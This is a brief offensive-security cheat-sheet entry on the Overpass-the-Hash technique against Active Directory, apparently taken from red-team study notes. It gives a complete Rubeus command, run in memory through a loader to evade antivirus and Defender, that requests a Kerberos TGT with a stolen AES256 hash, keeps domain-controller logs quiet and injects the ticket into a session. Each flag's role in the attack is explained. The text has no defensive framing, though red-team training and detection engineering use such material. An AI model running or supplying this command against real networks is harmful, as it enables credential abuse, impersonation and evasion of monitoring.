Overpass-the-Hash

A technique for obtaining a TGT (Ticket Granting Ticket) using an AES hash instead of a password, thereby evading detection.

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:[USER] /aes256:[HASH] /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

• Loader.exe: Runs Rubeus in memory (AV/Defender evasion).

• asktgt: Requests a TGT from the KDC (Domain Controller).

• /user /aes256: Target identity and secret (Overpass-the-Hash attack).

• /opsec: Minimizes noise in the DC logs (simulates a legitimate login).

• /createnetonly: Creates a new cmd.exe process with an isolated network identity (LUID).

• /ptt: Injects the ticket directly into the current session (Pass-the-Ticket attack).